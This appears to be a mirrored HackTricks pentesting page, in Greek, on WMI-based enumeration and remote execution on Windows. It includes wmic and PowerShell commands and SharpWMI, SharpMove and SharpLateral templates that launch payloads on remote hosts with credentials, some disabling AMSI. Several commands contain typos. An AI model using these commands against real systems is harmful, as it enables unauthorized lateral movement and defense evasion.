mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
127 lines
7.5 KiB
Markdown
127 lines
7.5 KiB
Markdown
# WmiExec
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## Πώς Λειτουργεί
|
||
|
||
Διεργασίες μπορούν να ανοιχτούν σε hosts όπου το όνομα χρήστη και είτε ο κωδικός πρόσβασης είτε το hash είναι γνωστά μέσω της χρήσης του WMI. Οι εντολές εκτελούνται χρησιμοποιώντας το WMI από το Wmiexec, παρέχοντας μια ημι-διαδραστική εμπειρία shell.
|
||
|
||
**dcomexec.py:** Χρησιμοποιώντας διαφορετικά DCOM endpoints, αυτό το script προσφέρει μια ημι-διαδραστική shell παρόμοια με το wmiexec.py, εκμεταλλευόμενο συγκεκριμένα το αντικείμενο ShellBrowserWindow DCOM. Υποστηρίζει επί του παρόντος τα αντικείμενα MMC20. Application, Shell Windows και Shell Browser Window. (source: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
|
||
|
||
## Βασικές Αρχές WMI
|
||
|
||
### Namespace
|
||
|
||
Δομημένο σε ιεραρχία τύπου καταλόγου, το κορυφαίο επίπεδο του WMI είναι το \root, κάτω από το οποίο οργανώνονται πρόσθετοι κατάλογοι, που αναφέρονται ως namespaces.
|
||
Εντολές για την καταγραφή namespaces:
|
||
```bash
|
||
# Retrieval of Root namespaces
|
||
gwmi -namespace "root" -Class "__Namespace" | Select Name
|
||
|
||
# Enumeration of all namespaces (administrator privileges may be required)
|
||
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
||
|
||
# Listing of namespaces within "root\cimv2"
|
||
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
|
||
```
|
||
Οι κλάσεις μέσα σε ένα namespace μπορούν να απαριθμηθούν χρησιμοποιώντας:
|
||
```bash
|
||
gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
|
||
gwmi -Namespace "root/microsoft" -List -Recurse
|
||
```
|
||
### **Classes**
|
||
|
||
Η γνώση ενός ονόματος κλάσης WMI, όπως το win32_process, και του ονόματος του namespace στο οποίο ανήκει είναι κρίσιμη για οποιαδήποτε WMI λειτουργία.
|
||
Εντολές για να καταγράψετε τις κλάσεις που αρχίζουν με `win32`:
|
||
```bash
|
||
Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
|
||
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
|
||
```
|
||
Κλήση μιας κλάσης:
|
||
```bash
|
||
# Defaults to "root/cimv2" when namespace isn't specified
|
||
Get-WmiObject -Class win32_share
|
||
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
|
||
```
|
||
### Μέθοδοι
|
||
|
||
Οι μέθοδοι, οι οποίες είναι μία ή περισσότερες εκτελέσιμες συναρτήσεις των κλάσεων WMI, μπορούν να εκτελούνται.
|
||
```bash
|
||
# Class loading, method listing, and execution
|
||
$c = [wmiclass]"win32_share"
|
||
$c.methods
|
||
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")
|
||
```
|
||
|
||
```bash
|
||
# Method listing and invocation
|
||
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
|
||
```
|
||
## WMI Enumeration
|
||
|
||
### WMI Service Status
|
||
|
||
Εντολές για να επαληθεύσετε αν η υπηρεσία WMI είναι λειτουργική:
|
||
```bash
|
||
# WMI service status check
|
||
Get-Service Winmgmt
|
||
|
||
# Via CMD
|
||
net start | findstr "Instrumentation"
|
||
```
|
||
### Πληροφορίες Συστήματος και Διαδικασίας
|
||
|
||
Gathering system and process information through WMI:
|
||
```bash
|
||
Get-WmiObject -ClassName win32_operatingsystem | select * | more
|
||
Get-WmiObject win32_process | Select Name, Processid
|
||
```
|
||
Για τους επιτιθέμενους, το WMI είναι ένα ισχυρό εργαλείο για την καταμέτρηση ευαίσθητων δεδομένων σχετικά με συστήματα ή τομείς.
|
||
```bash
|
||
wmic computerystem list full /format:list
|
||
wmic process list /format:list
|
||
wmic ntdomain list /format:list
|
||
wmic useraccount list /format:list
|
||
wmic group list /format:list
|
||
wmic sysaccount list /format:list
|
||
```
|
||
Η απομακρυσμένη ερώτηση του WMI για συγκεκριμένες πληροφορίες, όπως οι τοπικοί διαχειριστές ή οι συνδεδεμένοι χρήστες, είναι εφικτή με προσεκτική κατασκευή εντολών.
|
||
|
||
### **Χειροκίνητη Απομακρυσμένη Ερώτηση WMI**
|
||
|
||
Η διακριτική αναγνώριση τοπικών διαχειριστών σε μια απομακρυσμένη μηχανή και συνδεδεμένων χρηστών μπορεί να επιτευχθεί μέσω συγκεκριμένων ερωτήσεων WMI. Το `wmic` υποστηρίζει επίσης την ανάγνωση από ένα αρχείο κειμένου για την εκτέλεση εντολών σε πολλαπλούς κόμβους ταυτόχρονα.
|
||
|
||
Για να εκτελέσετε απομακρυσμένα μια διαδικασία μέσω WMI, όπως η ανάπτυξη ενός πράκτορα Empire, χρησιμοποιείται η παρακάτω δομή εντολής, με την επιτυχία της εκτέλεσης να υποδεικνύεται από μια τιμή επιστροφής "0":
|
||
```bash
|
||
wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
|
||
```
|
||
Αυτή η διαδικασία απεικονίζει την ικανότητα του WMI για απομακρυσμένη εκτέλεση και καταμέτρηση συστήματος, επισημαίνοντας τη χρησιμότητά του τόσο για τη διαχείριση συστημάτων όσο και για το pentesting.
|
||
|
||
## Αυτόματα Εργαλεία
|
||
|
||
- [**SharpLateral**](https://github.com/mertdas/SharpLateral):
|
||
```bash
|
||
SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
|
||
```
|
||
- [**SharpWMI**](https://github.com/GhostPack/SharpWMI)
|
||
```bash
|
||
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true]
|
||
# Stealthier execution with VBS
|
||
SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
|
||
```
|
||
- [**https://github.com/0xthirteen/SharpMove**](https://github.com/0xthirteen/SharpMove):
|
||
```bash
|
||
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
|
||
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
|
||
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
|
||
```
|
||
- Μπορείτε επίσης να χρησιμοποιήσετε **Impacket's `wmiexec`**.
|
||
|
||
|
||
## Αναφορές
|
||
|
||
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|